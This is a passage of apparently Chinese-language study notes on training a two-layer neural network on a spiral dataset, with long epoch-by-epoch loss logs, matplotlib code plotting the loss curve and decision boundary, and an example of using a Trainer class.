34 |  iter 10 / 10 | loss 0.78| epoch 35 |  iter 10 / 10 | loss 0.75| epoch 36 |  iter 10 / 10 | loss 0.74| epoch 37 |  iter 10 / 10 | loss 0.76| epoch 38 |  iter 10 / 10 | loss 0.76| epoch 39 |  iter 10 / 10 | loss 0.73| epoch 40 |  iter 10 / 10 | loss 0.75| epoch 41 |  iter 10 / 10 | loss 0.76| epoch 42 |  iter 10 / 10 | loss 0.76| epoch 43 |  iter 10 / 10 | loss 0.76| epoch 44 |  iter 10 / 10 | loss 0.74| epoch 45 |  iter 10 / 10 | loss 0.75| epoch 46 |  iter 10 / 10 | loss 0.73| epoch 47 |  iter 10 / 10 | loss 0.72| epoch 48 |  iter 10 / 10 | loss 0.73| epoch 49 |  iter 10 / 10 | loss 0.72| epoch 50 |  iter 10 / 10 | loss 0.72| epoch 51 |  iter 10 / 10 | loss 0.72| epoch 52 |  iter 10 / 10 | loss 0.72| epoch 53 |  iter 10 / 10 | loss 0.74| epoch 54 |  iter 10 / 10 | loss 0.74| epoch 55 |  iter 10 / 10 | loss 0.72| epoch 56 |  iter 10 / 10 | loss 0.72| epoch 57 |  iter 10 / 10 | loss 0.71| epoch 58 |  iter 10 / 10 | loss 0.70| epoch 59 |  iter 10 / 10 | loss 0.72| epoch 60 |  iter 10 / 10 | loss 0.70| epoch 61 |  iter 10 / 10 | loss 0.71| epoch 62 |  iter 10 / 10 | loss 0.72| epoch 63 |  iter 10 / 10 | loss 0.70| epoch 64 |  iter 10 / 10 | loss 0.71| epoch 65 |  iter 10 / 10 | loss 0.73| epoch 66 |  iter 10 / 10 | loss 0.70| epoch 67 |  iter 10 / 10 | loss 0.71| epoch 68 |  iter 10 / 10 | loss 0.69| epoch 69 |  iter 10 / 10 | loss 0.70| epoch 70 |  iter 10 / 10 | loss 0.71| epoch 71 |  iter 10 / 10 | loss 0.68| epoch 72 |  iter 10 / 10 | loss 0.69| epoch 73 |  iter 10 / 10 | loss 0.67| epoch 74 |  iter 10 / 10 | loss 0.68| epoch 75 |  iter 10 / 10 | loss 0.67| epoch 76 |  iter 10 / 10 | loss 0.66| epoch 77 |  iter 10 / 10 | loss 0.69| epoch 78 |  iter 10 / 10 | loss 0.64| epoch 79 |  iter 10 / 10 | loss 0.68| epoch 80 |  iter 10 / 10 | loss 0.64| epoch 81 |  iter 10 / 10 | loss 0.64| epoch 82 |  iter 10 / 10 | loss 0.66| epoch 83 |  iter 10 / 10 | loss 0.62| epoch 84 |  iter 10 / 10 | loss 0.62| epoch 85 |  iter 10 / 10 | loss 0.61| epoch 86 |  iter 10 / 10 | loss 0.60| epoch 87 |  iter 10 / 10 | loss 0.60| epoch 88 |  iter 10 / 10 | loss 0.61| epoch 89 |  iter 10 / 10 | loss 0.59| epoch 90 |  iter 10 / 10 | loss 0.58| epoch 91 |  iter 10 / 10 | loss 0.56| epoch 92 |  iter 10 / 10 | loss 0.56| epoch 93 |  iter 10 / 10 | loss 0.54| epoch 94 |  iter 10 / 10 | loss 0.53| epoch 95 |  iter 10 / 10 | loss 0.53| epoch 96 |  iter 10 / 10 | loss 0.52| epoch 97 |  iter 10 / 10 | loss 0.51| epoch 98 |  iter 10 / 10 | loss 0.50| epoch 99 |  iter 10 / 10 | loss 0.48| epoch 100 |  iter 10 / 10 | loss 0.48| epoch 101 |  iter 10 / 10 | loss 0.46| epoch 102 |  iter 10 / 10 | loss 0.45| epoch 103 |  iter 10 / 10 | loss 0.45| epoch 104 |  iter 10 / 10 | loss 0.44| epoch 105 |  iter 10 / 10 | loss 0.44| epoch 106 |  iter 10 / 10 | loss 0.41| epoch 107 |  iter 10 / 10 | loss 0.40| epoch 108 |  iter 10 / 10 | loss 0.41| epoch 109 |  iter 10 / 10 | loss 0.40| epoch 110 |  iter 10 / 10 | loss 0.40| epoch 111 |  iter 10 / 10 | loss 0.38| epoch 112 |  iter 10 / 10 | loss 0.38| epoch 113 |  iter 10 / 10 | loss 0.36| epoch 114 |  iter 10 / 10 | loss 0.37| epoch 115 |  iter 10 / 10 | loss 0.35| epoch 116 |  iter 10 / 10 | loss 0.34| epoch 117 |  iter 10 / 10 | loss 0.34| epoch 118 |  iter 10 / 10 | loss 0.34| epoch 119 |  iter 10 / 10 | loss 0.33| epoch 120 |  iter 10 / 10 | loss 0.34| epoch 121 |  iter 10 / 10 | loss 0.32| epoch 122 |  iter 10 / 10 | loss 0.32| epoch 123 |  iter 10 / 10 | loss 0.31| epoch 124 |  iter 10 / 10 | loss 0.31| epoch 125 |  iter 10 / 10 | loss 0.30| epoch 126 |  iter 10 / 10 | loss 0.30| epoch 127 |  iter 10 / 10 | loss 0.28| epoch 128 |  iter 10 / 10 | loss 0.28| epoch 129 |  iter 10 / 10 | loss 0.28| epoch 130 |  iter 10 / 10 | loss 0.28| epoch 131 |  iter 10 / 10 | loss 0.27| epoch 132 |  iter 10 / 10 | loss 0.27| epoch 133 |  iter 10 / 10 | loss 0.27| epoch 134 |  iter 10 / 10 | loss 0.27| epoch 135 |  iter 10 / 10 | loss 0.27| epoch 136 |  iter 10 / 10 | loss 0.26| epoch 137 |  iter 10 / 10 | loss 0.26| epoch 138 |  iter 10 / 10 | loss 0.26| epoch 139 |  iter 10 / 10 | loss 0.25| epoch 140 |  iter 10 / 10 | loss 0.24| epoch 141 |  iter 10 / 10 | loss 0.24| epoch 142 |  iter 10 / 10 | loss 0.25| epoch 143 |  iter 10 / 10 | loss 0.24| epoch 144 |  iter 10 / 10 | loss 0.24| epoch 145 |  iter 10 / 10 | loss 0.23| epoch 146 |  iter 10 / 10 | loss 0.24| epoch 147 |  iter 10 / 10 | loss 0.23| epoch 148 |  iter 10 / 10 | loss 0.23| epoch 149 |  iter 10 / 10 | loss 0.22| epoch 150 |  iter 10 / 10 | loss 0.22| epoch 151 |  iter 10 / 10 | loss 0.22| epoch 152 |  iter 10 / 10 | loss 0.22| epoch 153 |  iter 10 / 10 | loss 0.22| epoch 154 |  iter 10 / 10 | loss 0.22| epoch 155 |  iter 10 / 10 | loss 0.22| epoch 156 |  iter 10 / 10 | loss 0.21| epoch 157 |  iter 10 / 10 | loss 0.21| epoch 158 |  iter 10 / 10 | loss 0.20| epoch 159 |  iter 10 / 10 | loss 0.21| epoch 160 |  iter 10 / 10 | loss 0.20| epoch 161 |  iter 10 / 10 | loss 0.20| epoch 162 |  iter 10 / 10 | loss 0.20| epoch 163 |  iter 10 / 10 | loss 0.21| epoch 164 |  iter 10 / 10 | loss 0.20| epoch 165 |  iter 10 / 10 | loss 0.20| epoch 166 |  iter 10 / 10 | loss 0.19| epoch 167 |  iter 10 / 10 | loss 0.19| epoch 168 |  iter 10 / 10 | loss 0.19| epoch 169 |  iter 10 / 10 | loss 0.19| epoch 170 |  iter 10 / 10 | loss 0.19| epoch 171 |  iter 10 / 10 | loss 0.19| epoch 172 |  iter 10 / 10 | loss 0.18| epoch 173 |  iter 10 / 10 | loss 0.18| epoch 174 |  iter 10 / 10 | loss 0.18| epoch 175 |  iter 10 / 10 | loss 0.18| epoch 176 |  iter 10 / 10 | loss 0.18| epoch 177 |  iter 10 / 10 | loss 0.18| epoch 178 |  iter 10 / 10 | loss 0.18| epoch 179 |  iter 10 / 10 | loss 0.17| epoch 180 |  iter 10 / 10 | loss 0.17| epoch 181 |  iter 10 / 10 | loss 0.18| epoch 182 |  iter 10 / 10 | loss 0.17| epoch 183 |  iter 10 / 10 | loss 0.18| epoch 184 |  iter 10 / 10 | loss 0.17| epoch 185 |  iter 10 / 10 | loss 0.17| epoch 186 |  iter 10 / 10 | loss 0.18| epoch 187 |  iter 10 / 10 | loss 0.17| epoch 188 |  iter 10 / 10 | loss 0.17| epoch 189 |  iter 10 / 10 | loss 0.17| epoch 190 |  iter 10 / 10 | loss 0.17| epoch 191 |  iter 10 / 10 | loss 0.16| epoch 192 |  iter 10 / 10 | loss 0.17| epoch 193 |  iter 10 / 10 | loss 0.16| epoch 194 |  iter 10 / 10 | loss 0.16| epoch 195 |  iter 10 / 10 | loss 0.16| epoch 196 |  iter 10 / 10 | loss 0.16| epoch 197 |  iter 10 / 10 | loss 0.16| epoch 198 |  iter 10 / 10 | loss 0.15| epoch 199 |  iter 10 / 10 | loss 0.16| epoch 200 |  iter 10 / 10 | loss 0.16| epoch 201 |  iter 10 / 10 | loss 0.15| epoch 202 |  iter 10 / 10 | loss 0.16| epoch 203 |  iter 10 / 10 | loss 0.16| epoch 204 |  iter 10 / 10 | loss 0.15| epoch 205 |  iter 10 / 10 | loss 0.16| epoch 206 |  iter 10 / 10 | loss 0.15| epoch 207 |  iter 10 / 10 | loss 0.15| epoch 208 |  iter 10 / 10 | loss 0.15| epoch 209 |  iter 10 / 10 | loss 0.15| epoch 210 |  iter 10 / 10 | loss 0.15| epoch 211 |  iter 10 / 10 | loss 0.15| epoch 212 |  iter 10 / 10 | loss 0.15| epoch 213 |  iter 10 / 10 | loss 0.15| epoch 214 |  iter 10 / 10 | loss 0.15| epoch 215 |  iter 10 / 10 | loss 0.15| epoch 216 |  iter 10 / 10 | loss 0.14| epoch 217 |  iter 10 / 10 | loss 0.14| epoch 218 |  iter 10 / 10 | loss 0.15| epoch 219 |  iter 10 / 10 | loss 0.14| epoch 220 |  iter 10 / 10 | loss 0.14| epoch 221 |  iter 10 / 10 | loss 0.14| epoch 222 |  iter 10 / 10 | loss 0.14| epoch 223 |  iter 10 / 10 | loss 0.14| epoch 224 |  iter 10 / 10 | loss 0.14| epoch 225 |  iter 10 / 10 | loss 0.14| epoch 226 |  iter 10 / 10 | loss 0.14| epoch 227 |  iter 10 / 10 | loss 0.14| epoch 228 |  iter 10 / 10 | loss 0.14| epoch 229 |  iter 10 / 10 | loss 0.13| epoch 230 |  iter 10 / 10 | loss 0.14| epoch 231 |  iter 10 / 10 | loss 0.13| epoch 232 |  iter 10 / 10 | loss 0.14| epoch 233 |  iter 10 / 10 | loss 0.13| epoch 234 |  iter 10 / 10 | loss 0.13| epoch 235 |  iter 10 / 10 | loss 0.13| epoch 236 |  iter 10 / 10 | loss 0.13| epoch 237 |  iter 10 / 10 | loss 0.14| epoch 238 |  iter 10 / 10 | loss 0.13| epoch 239 |  iter 10 / 10 | loss 0.13| epoch 240 |  iter 10 / 10 | loss 0.14| epoch 241 |  iter 10 / 10 | loss 0.13| epoch 242 |  iter 10 / 10 | loss 0.13| epoch 243 |  iter 10 / 10 | loss 0.13| epoch 244 |  iter 10 / 10 | loss 0.13| epoch 245 |  iter 10 / 10 | loss 0.13| epoch 246 |  iter 10 / 10 | loss 0.13| epoch 247 |  iter 10 / 10 | loss 0.13| epoch 248 |  iter 10 / 10 | loss 0.13| epoch 249 |  iter 10 / 10 | loss 0.13| epoch 250 |  iter 10 / 10 | loss 0.13| epoch 251 |  iter 10 / 10 | loss 0.13| epoch 252 |  iter 10 / 10 | loss 0.12| epoch 253 |  iter 10 / 10 | loss 0.12| epoch 254 |  iter 10 / 10 | loss 0.12| epoch 255 |  iter 10 / 10 | loss 0.12| epoch 256 |  iter 10 / 10 | loss 0.12| epoch 257 |  iter 10 / 10 | loss 0.12| epoch 258 |  iter 10 / 10 | loss 0.12| epoch 259 |  iter 10 / 10 | loss 0.13| epoch 260 |  iter 10 / 10 | loss 0.12| epoch 261 |  iter 10 / 10 | loss 0.13| epoch 262 |  iter 10 / 10 | loss 0.12| epoch 263 |  iter 10 / 10 | loss 0.12| epoch 264 |  iter 10 / 10 | loss 0.13| epoch 265 |  iter 10 / 10 | loss 0.12| epoch 266 |  iter 10 / 10 | loss 0.12| epoch 267 |  iter 10 / 10 | loss 0.12| epoch 268 |  iter 10 / 10 | loss 0.12| epoch 269 |  iter 10 / 10 | loss 0.11| epoch 270 |  iter 10 / 10 | loss 0.12| epoch 271 |  iter 10 / 10 | loss 0.12| epoch 272 |  iter 10 / 10 | loss 0.12| epoch 273 |  iter 10 / 10 | loss 0.12| epoch 274 |  iter 10 / 10 | loss 0.12| epoch 275 |  iter 10 / 10 | loss 0.11| epoch 276 |  iter 10 / 10 | loss 0.12| epoch 277 |  iter 10 / 10 | loss 0.12| epoch 278 |  iter 10 / 10 | loss 0.11| epoch 279 |  iter 10 / 10 | loss 0.11| epoch 280 |  iter 10 / 10 | loss 0.11| epoch 281 |  iter 10 / 10 | loss 0.11| epoch 282 |  iter 10 / 10 | loss 0.12| epoch 283 |  iter 10 / 10 | loss 0.11| epoch 284 |  iter 10 / 10 | loss 0.11| epoch 285 |  iter 10 / 10 | loss 0.11| epoch 286 |  iter 10 / 10 | loss 0.11| epoch 287 |  iter 10 / 10 | loss 0.11| epoch 288 |  iter 10 / 10 | loss 0.12| epoch 289 |  iter 10 / 10 | loss 0.11| epoch 290 |  iter 10 / 10 | loss 0.11| epoch 291 |  iter 10 / 10 | loss 0.11| epoch 292 |  iter 10 / 10 | loss 0.11| epoch 293 |  iter 10 / 10 | loss 0.11| epoch 294 |  iter 10 / 10 | loss 0.11| epoch 295 |  iter 10 / 10 | loss 0.12| epoch 296 |  iter 10 / 10 | loss 0.11| epoch 297 |  iter 10 / 10 | loss 0.12| epoch 298 |  iter 10 / 10 | loss 0.11| epoch 299 |  iter 10 / 10 | loss 0.11| epoch 300 |  iter 10 / 10 | loss 0.11
    1
    2
    3
    4
    5
    # 绘制学习结果
    plt.plot(np.arange(len(loss_list)), loss_list, label='train')
    plt.xlabel('iterations (x10)')
    plt.ylabel('loss')
    plt.show()


    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    # 绘制决策边界
    h = 0.001
    x_min, x_max = x[:, 0].min() - .1, x[:, 0].max() + .1
    y_min, y_max = x[:, 1].min() - .1, x[:, 1].max() + .1
    xx, yy = np.meshgrid(np.arange(x_min, x_max, h), np.arange(y_min, y_max, h))
    X = np.c_[xx.ravel(), yy.ravel()]
    score = model.predict(X)
    predict_cls = np.argmax(score, axis=1)
    Z = predict_cls.reshape(xx.shape)
    plt.contourf(xx, yy, Z)
    plt.axis('off')

    # 绘制数据点
    x, t = spiral.load_data()
    N = 100
    CLS_NUM = 3
    markers = ['o', 'x', '^']
    for i in range(CLS_NUM):
    plt.scatter(x[i*N:(i+1)*N, 0], x[i*N:(i+1)*N, 1], s=40, marker=markers[i])
    plt.show()

    png

    1.4.4 Trainer 类

    将执行神经网络的学习封装成一个类。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    import sys
    sys.path.append('..')
    from common.optimizer import SGD
    from common.trainer import Trainer
    from dataset import spiral

    max_epoch = 300
    batch_size = 30
    hidden_size = 10
    learning_rate = 1.0
    x, t = spiral.load_data()
    model = TwoLayerNet(input_size=2, hidden_size=hidden_size, output_size=3)
    optimizer = SGD(lr=learning_rate)
    trainer = Trainer(model, optimizer)
    """
    x: 输入数据
    t: 监督标签
    max_epoch (= 10): 进行学习的 epoch 数
    batch_size(= 32): mini-batch 的大小
    eval_interval(= 20): 输出结果(平均损失等)的间隔。
    例如设置 eval_interval=20,则每 20 次迭代计算 1 次平均损失,并将结果输出到界面上。
    max_grad(= None): 梯度的最大范数。
    """
    trainer.fit(x, t, max_epoch, batch_size, eval_interval=10)
    trainer.plot()
    | epoch 1 |  iter 1 / 10 | time 0[s] | loss 1.10| epoch 2 |  iter 1 / 10 | time 0[s] | loss 1.12| epoch 3 |  iter 1 / 10 | time 0[s] | loss 1.13| epoch 4 |  iter 1 / 10 | time 0[s] | loss 1.12| epoch 5 |  iter 1 / 10 | time 0[s] | loss 1.12| epoch 6 |  iter 1 / 10 | time 0[s] | loss 1.10| epoch 7 |  iter 1 / 10 | time 0[s] | loss 1.14| epoch 8 |  iter 1 / 10 | time 0[s] | loss 1.16| epoch 9 |  iter 1 / 10 | time 0[s] | loss 1.11| epoch 10 |  iter 1 / 10 | time 0[s] | loss 1.12| epoch 11 |  iter 1 / 10 | time 0[s] | loss 1.12| epoch 12 |  iter 1 / 10 | time 0[s] | loss 1.12| epoch 13 |  iter 1 / 10 | time 0[s] | loss 1.10| epoch 14 |  iter 1 / 10 | time 0[s] | loss 1.09| epoch 15 |  iter 1 / 10 | time 0[s] | loss 1.08| epoch 16 |  iter 1 / 10 | time 0[s] | loss 1.04| epoch 17 |  iter 1 / 10 | time 0[s] | loss 1.03| epoch 18 |  iter 1 / 10 | time 0[s] | loss 0.94| epoch 19 |  iter 1 / 10 | time 0[s] | loss 0.92| epoch 20 |  iter 1 / 10 | time 0[s] | loss 0.92| epoch 21 |  iter 1 / 10 | time 0[s] | loss 0.87| epoch 22 |  iter 1 / 10 | time 0[s] | loss 0.85| epoch 23 |  iter 1 / 10 | time 0[s] | loss 0.80| epoch 24 |  iter 1 / 10 | time 0[s] | loss 0.79| epoch 25 |  iter 1 / 10 | time 0[s] | loss 0.78| epoch 26 |  iter 1 / 10 | time 0[s] | loss 0.83| epoch 27 |  iter 1 / 10 | time 0[s] | loss 0.77| epoch 28 |  iter 1 / 10 | time 0[s] | loss 0.76| epoch 29 |  iter 1 / 10 | time 0[s] | loss 0.77| epoch 30 |  iter 1 / 10 | time 0[s] | loss 0.76| epoch 31 |  iter 1 / 10 | time 0[s] | loss 0.77| epoch 32 |  iter 1 / 10 | time 0[s] | loss 0.75| epoch 33 |  iter 1 / 10 | time 0[s] | loss 0.78| epoch 34 |  iter 1 / 10 | time 0[s] | loss 0.77| epoch 35 |  iter 1 / 10 | time 0[s] | loss 0.78| epoch 36 |  iter 1 / 10 | time 0[s] | loss 0.74| epoch 37 |  iter 1 / 10 | time 0[s] | loss 0.75| epoch 38 |  iter 1 / 10 | time 0[s] | loss 0.77| epoch 39 |  iter 1 / 10 | time 0[s] | loss 0.75| epoch 40 |  iter 1 / 10 | time 0[s] | loss 0.73| epoch 41 |  iter 1 / 10 | time 0[s] | loss 0.75| epoch 42 |  iter 1 / 10 | time 0[s] | loss 0.76| epoch 43 |  iter 1 / 10 | time 0[s] | loss 0.79| epoch 44 |  iter 1 / 10 | time 0[s] | loss 0.74| epoch 45 |  iter 1 / 10 | time 0[s] | loss 0.75| epoch 46 |  iter 1 / 10 | time 0[s] | loss 0.73| epoch 47 |  iter 1 / 10 | time 0[s] | loss 0.73| epoch 48 |  iter 1 / 10 | time 0[s] | loss 0.73| epoch 49 |  iter 1 / 10 | time 0[s] | loss 0.73| epoch 50 |  iter 1 / 10 | time 0[s] | loss 0.72| epoch 51 |  iter 1 / 10 | time 0[s] | loss 0.72| epoch 52 |  iter 1 / 10 | time 0[s] | loss 0.72| epoch 53 |  iter 1 / 10 | time 0[s] | loss 0.72| epoch 54 |  iter 1 / 10 | time 0[s] | loss 0.74| epoch 55 |  iter 1 / 10 | time 0[s] | loss 0.74| epoch 56 |  iter 1 / 10 | time 0[s] | loss 0.73| epoch 57 |  iter 1 / 10 | time 0[s] | loss 0.72| epoch 58 |  iter 1 / 10 | time 0[s] | loss 0.69| epoch 59 |  iter 1 / 10 | time 0[s] | loss 0.72| epoch 60 |  iter 1 / 10 | time 0[s] | loss 0.70| epoch 61 |  iter 1 / 10 | time 0[s] | loss 0.69| epoch 62 |  iter 1 / 10 | time 0[s] | loss 0.71| epoch 63 |  iter 1 / 10 | time 0[s] | loss 0.70| epoch 64 |  iter 1 / 10 | time 0[s] | loss 0.71| epoch 65 |  iter 1 / 10 | time 0[s] | loss 0.72| epoch 66 |  iter 1 / 10 | time 0[s] | loss 0.71| epoch 67 |  iter 1 / 10 | time 0[s] | loss 0.71| epoch 68 |  iter 1 / 10 | time 0[s] | loss 0.71| epoch 69 |  iter 1 / 10 | time 0[s] | loss 0.70| epoch 70 |  iter 1 / 10 | time 0[s] | loss 0.68| epoch 71 |  iter 1 / 10 | time 0[s] | loss 0.73| epoch 72 |  iter 1 / 10 | time 0[s] | loss 0.66| epoch 73 |  iter 1 / 10 | time 0[s] | loss 0.69| epoch 74 |  iter 1 / 10 | time 0[s] | loss 0.66| epoch 75 |  iter 1 / 10 | time 0[s] | loss 0.70| epoch 76 |  iter 1 / 10 | time 0[s] | loss 0.65| epoch 77 |  iter 1 / 10 | time 0[s] | loss 0.67| epoch 78 |  iter 1 / 10 | time 0[s] | loss 0.70| epoch 79 |  iter 1 / 10 | time 0[s] | loss 0.63| epoch 80 |  iter 1 / 10 | time 0[s] | loss 0.66| epoch 81 |  iter 1 / 10 | time 0[s] | loss 0.65| epoch 82 |  iter 1 / 10 | time 0[s] | loss 0.66| epoch 83 |  iter 1 / 10 | time 0[s] | loss 0.64| epoch 84 |  iter 1 / 10 | time 0[s] | loss 0.62| epoch 85 |  iter 1 / 10 | time 0[s] | loss 0.62| epoch 86 |  iter 1 / 10 | time 0[s] | loss 0.63| epoch 87 |  iter 1 / 10 | time 0[s] | loss 0.59| epoch 88 |  iter 1 / 10 | time 0[s] | loss 0.58| epoch 89 |  iter 1 / 10 | time 0[s] | loss 0.61| epoch 90 |  iter 1 / 10 | time 0[s] | loss 0.59| epoch 91 |  iter 1 / 10 | time 0[s] | loss 0.58| epoch 92 |  iter 1 / 10 | time 0[s] | loss 0.57| epoch 93 |  iter 1 / 10 | time 0[s] | loss 0.55| epoch 94 |  iter 1 / 10 | time 0[s] | loss 0.54| epoch 95 |  iter 1 / 10 | time 0[s] | loss 0.53| epoch 96 |  iter 1 / 10 | time 0[s] | loss 0.54| epoch 97 |  iter 1 / 10 | time 0[s] | loss 0.51| epoch 98 |  iter 1 / 10 | time 0[s] | loss 0.51| epoch 99 |  iter 1 / 10 | time 0[s] | loss 0.50| epoch 100 |  iter 1 / 10 | time 0[s] | loss 0.47| epoch 101 |  iter 1 / 10 | time 0[s] | loss 0.49| epoch 102 |  iter 1 / 10 | time 0[s] | loss 0.46| epoch 103 |  iter 1 / 10 | time 0[s] | loss 0.44| epoch 104 |  iter 1 / 10 | time 0[s] | loss 0.47| epoch 105 |  iter 1 / 10 | time 0[s] | loss 0.44| epoch 106 |  iter 1 / 10 | time 0[s] | loss 0.43| epoch 107 |  iter 1 / 10 | time 0[s] | loss 0.43| epoch 108 |  iter 1 / 10 | time 0[s] | loss 0.39| epoch 109 |  iter 1 / 10 | time 0[s] | loss 0.40| epoch 110 |  iter 1 / 10 | time 0[s] | loss 0.41| epoch 111 |  iter 1 / 10 | time 0[s] | loss 0.38| epoch 112 |  iter 1 / 10 | time 0[s] | loss 0.38| epoch 113 |  iter 1 / 10 | time 0[s] | loss 0.38| epoch 114 |  iter 1 / 10 | time 0[s] | loss 0.37| epoch 115 |  iter 1 / 10 | time 0[s] | loss 0.36| epoch 116 |  iter 1 / 10 | time 0[s] | loss 0.34| epoch 117 |  iter 1 / 10 | time 0[s] | loss 0.35| epoch 118 |  iter 1 / 10 | time 0[s] | loss 0.33| epoch 119 |  iter 1 / 10 | time 0[s] | loss 0.35| epoch 120 |  iter 1 / 10 | time 0[s] | loss 0.33| epoch 121 |  iter 1 / 10 | time 0[s] | loss 0.33| epoch 122 |  iter 1 / 10 | time 0[s] | loss 0.32| epoch 123 |  iter 1 / 10 | time 0[s] | loss 0.31| epoch 124 |  iter 1 / 10 | time 0[s] | loss 0.31| epoch 125 |  iter 1 / 10 | time 0[s] | loss 0.31| epoch 126 |  iter 1 / 10 | time 0[s] | loss 0.30| epoch 127 |  iter 1 / 10 | time 0[s] | loss 0.30| epoch 128 |  iter 1 / 10 | time 0[s] | loss 0.27| epoch 129 |  iter 1 / 10 | time 0[s] | loss 0.30| epoch 130 |  iter 1 / 10 | time 0[s] | loss 0.28| epoch 131 |  iter 1 / 10 | time 0[s] | loss 0.26| epoch 132 |  iter 1 / 10 | time 0[s] | loss 0.27| epoch 133 |  iter 1 / 10 | time 0[s] | loss 0.27| epoch 134 |  iter 1 / 10 | time 0[s] | loss 0.28| epoch 135 |  iter 1 / 10 | time 0[s] | loss 0.26| epoch 136 |  iter 1 / 10 | time 0[s] | loss 0.28| epoch 137 |  iter 1 / 10 | time 0[s] | loss 0.25| epoch 138 |  iter 1 / 10 | time 0[s] | loss 0.26| epoch 139 |  iter 1 / 10 | time 0[s] | loss 0.26| epoch 140 |  iter 1 / 10 | time 0[s] | loss 0.26| epoch 141 |  iter 1 / 10 | time 0[s] | loss 0.23| epoch 142 |  iter 1 / 10 | time 0[s] | loss 0.23| epoch 143 |  iter 1 / 10 | time 0[s] | loss 0.26| epoch 144 |  iter 1 / 10 | time 0[s] | loss 0.23| epoch 145 |  iter 1 / 10 | time 0[s] | loss 0.24| epoch 146 |  iter 1 / 10 | time 0[s] | loss 0.24| epoch 147 |  iter 1 / 10 | time 0[s] | loss 0.25| epoch 148 |  iter 1 / 10 | time 0[s] | loss 0.21| epoch 149 |  iter 1 / 10 | time 0[s] | loss 0.23| epoch 150 |  iter 1 / 10 | time 0[s] | loss 0.22| epoch 151 |  iter 1 / 10 | time 0[s] | loss 0.22| epoch 152 |  iter 1 / 10 | time 0[s] | loss 0.23| epoch 153 |  iter 1 / 10 | time 0[s] | loss 0.23| epoch 154 |  iter 1 / 10 | time 0[s] | loss 0.20| epoch 155 |  iter 1 / 10 | time 0[s] | loss 0.22| epoch 156 |  iter 1 / 10 | time 0[s] | loss 0.21| epoch 157 |  iter 1 / 10 | time 0[s] | loss 0.21| epoch 158 |  iter 1 / 10 | time 0[s] | loss 0.20| epoch 159 |  iter 1 / 10 | time 0[s] | loss 0.21| epoch 160 |  iter 1 / 10 | time 0[s] | loss 0.20| epoch 161 |  iter 1 / 10 | time 0[s] | loss 0.19| epoch 162 |  iter 1 / 10 | time 0[s] | loss 0.22| epoch 163 |  iter 1 / 10 | time 0[s] | loss 0.19| epoch 164 |  iter 1 / 10 | time 0[s] | loss 0.21| epoch 165 |  iter 1 / 10 | time 0[s] | loss 0.20| epoch 166 |  iter 1 / 10 | time 0[s] | loss 0.20| epoch 167 |  iter 1 / 10 | time 0[s] | loss 0.20| epoch 168 |  iter 1 / 10 | time 0[s] | loss 0.19| epoch 169 |  iter 1 / 10 | time 0[s] | loss 0.18| epoch 170 |  iter 1 / 10 | time 0[s] | loss 0.19| epoch 171 |  iter 1 / 10 | time 0[s] | loss 0.19| epoch 172 |  iter 1 / 10 | time 0[s] | loss 0.20| epoch 173 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 174 |  iter 1 / 10 | time 0[s] | loss 0.20| epoch 175 |  iter 1 / 10 | time 0[s] | loss 0.18| epoch 176 |  iter 1 / 10 | time 0[s] | loss 0.17| epoch 177 |  iter 1 / 10 | time 0[s] | loss 0.17| epoch 178 |  iter 1 / 10 | time 0[s] | loss 0.17| epoch 179 |  iter 1 / 10 | time 0[s] | loss 0.18| epoch 180 |  iter 1 / 10 | time 0[s] | loss 0.19| epoch 181 |  iter 1 / 10 | time 0[s] | loss 0.17| epoch 182 |  iter 1 / 10 | time 0[s] | loss 0.18| epoch 183 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 184 |  iter 1 / 10 | time 0[s] | loss 0.18| epoch 185 |  iter 1 / 10 | time 0[s] | loss 0.18| epoch 186 |  iter 1 / 10 | time 0[s] | loss 0.17| epoch 187 |  iter 1 / 10 | time 0[s] | loss 0.17| epoch 188 |  iter 1 / 10 | time 0[s] | loss 0.18| epoch 189 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 190 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 191 |  iter 1 / 10 | time 0[s] | loss 0.17| epoch 192 |  iter 1 / 10 | time 0[s] | loss 0.17| epoch 193 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 194 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 195 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 196 |  iter 1 / 10 | time 0[s] | loss 0.17| epoch 197 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 198 |  iter 1 / 10 | time 0[s] | loss 0.17| epoch 199 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 200 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 201 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 202 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 203 |  iter 1 / 10 | time 0[s] | loss 0.15| epoch 204 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 205 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 206 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 207 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 208 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 209 |  iter 1 / 10 | time 0[s] | loss 0.15| epoch 210 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 211 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 212 |  iter 1 / 10 | time 0[s] | loss 0.15| epoch 213 |  iter 1 / 10 | time 0[s] | loss 0.15| epoch 214 |  iter 1 / 10 | time 0[s] | loss 0.15| epoch 215 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 216 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 217 |  iter 1 / 10 | time 0[s] | loss 0.15| epoch 218 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 219 |  iter 1 / 10 | time 0[s] | loss 0.15| epoch 220 |  iter 1 / 10 | time 0[s] | loss 0.15| epoch 221 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 222 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 223 |  iter 1 / 10 | time 0[s] | loss 0.15| epoch 224 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 225 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 226 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 227 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 228 |  iter 1 / 10 | time 0[s] | loss 0.15| 